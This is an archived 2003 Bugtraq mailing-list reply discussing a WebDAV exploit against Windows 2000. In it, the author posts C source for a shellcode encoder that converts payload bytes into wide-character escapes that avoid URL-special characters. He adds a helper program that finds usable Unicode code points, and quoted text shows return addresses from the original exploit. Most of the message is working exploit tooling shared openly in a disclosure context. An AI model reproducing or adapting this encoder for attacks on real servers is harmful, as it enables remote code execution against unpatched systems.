lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20030327014705.1411.qmail@www.securityfocus.com>
Date: 27 Mar 2003 01:47:05 -0000
From: JW Oh <mat@...key.org>
To: bugtraq@...urityfocus.com
Subject: Re: WebDAV exploit: using wide character decoder scheme


In-Reply-To: <20030326111443.6fb287a3.dave@...unitysec.com>

>
>Unfortunately, on my US Windows 2K SP3 build (and I assume all others),
>those %u directives get translated into question marks. (0x003F in hex)
>:<

I tested it only on Korean version of Windows(Server and Professional 
edition).

>
>This exploit must be much easier to get reliable on other language
>versions. A shame, really.

Shame???

>
>Did you use my encoder or did you write your shellcode manually, just
>out of curiosity?

The encoding scheme is so simple.

This is the shellcode encoder.

---------------------------------
/*
	mat@...key.org
	mat@...icsecurity.org

	Shellcode encoder for webdav exploit.
*/
#include <stdio.h>


int is_special(unsigned char num1)
{
	return (num1==0x3a || num1==0x26 || num1==0x3f || num1==0x25 || 
num1==0x23 || num1==0x20 || num1==0xa || num1==0xd || num1==0x2f || 
num1==0x2b || num1==0xb || num1==0x5c);
}


void main()
{
	int debug=0;
	int rc;
	unsigned char buffer[512];
	while(rc=read(0,buffer,sizeof(buffer)))
	{
		int i;
		for(i=0;i<rc;i++)
		{
			unsigned int num1=(buffer[i]/2)&0xff;
			unsigned int num2=(buffer[i]/2)&0xff;

			if(buffer[i]%2==1)
			{
				num2++;
			}
			while(is_special(num1) || is_special(num2))
			{
				num1++;
				num2--;
				if(num2==0)
				{
					printf("error!\n");
				}
			}
			if(buffer[i]==-1)//0xff)
			{
				num2=0x2a;
				if(debug)
				{
					printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
				}
				printf("%%u11d5\\x%.2x",num2);
			}else if(buffer[i]==1)
			{
				printf("%%u0411%%u00f0");
			}else{
				if(debug)
				{
					printf("\n%.2x(%4d): ",buffer[i]
&0xff,buffer[i]);
				}
				printf("\\x%.2x\\x%.2x",num1,num2);
			}
		}
	}
}

---------------------------------


And this is the code for finding valid unicode characters on my system.


---------------------------------
#include <windows.h>
#include <lm.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
	unsigned char i;
	unsigned char j;

	for(i=0;i<255;i++)
	{
		for(j=0;j<255;j++)
		{
			char string_to_copy[3];
			WCHAR src[256]={0,};
			char dest[256]={0,};

			string_to_copy[0]=i;
			string_to_copy[1]=j;
			string_to_copy[2]=0;
			memcpy(src,string_to_copy,strlen(string_to_copy));
			BOOL lpUsedDefaultChar;

			WideCharToMultiByte
(CP_ACP,0,src,1,dest,256,NULL,&lpUsedDefaultChar);

			if(!lpUsedDefaultChar)
			{
				printf("%.2x%.2x\n",j,i);
			}
		}
	}

	return 0;
}
---------------------------------

>
>Dave Aitel
>Advanced Engineering Directorate
>Immunity, Inc.
>http://www.immunitysec.com/CANVAS/ "Hacking like it's done in the
>movies."
>
>On Wed, 26 Mar 2003 22:55:12 +0900
>¿ÀÁ¤¿í <mat@...icsecurity.org> wrote:
>> my @return_addresses=(
>> "%u32ac%u77e2",
>> "%uc1b5%u76ae",
>> "%u005d%u77a5",
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ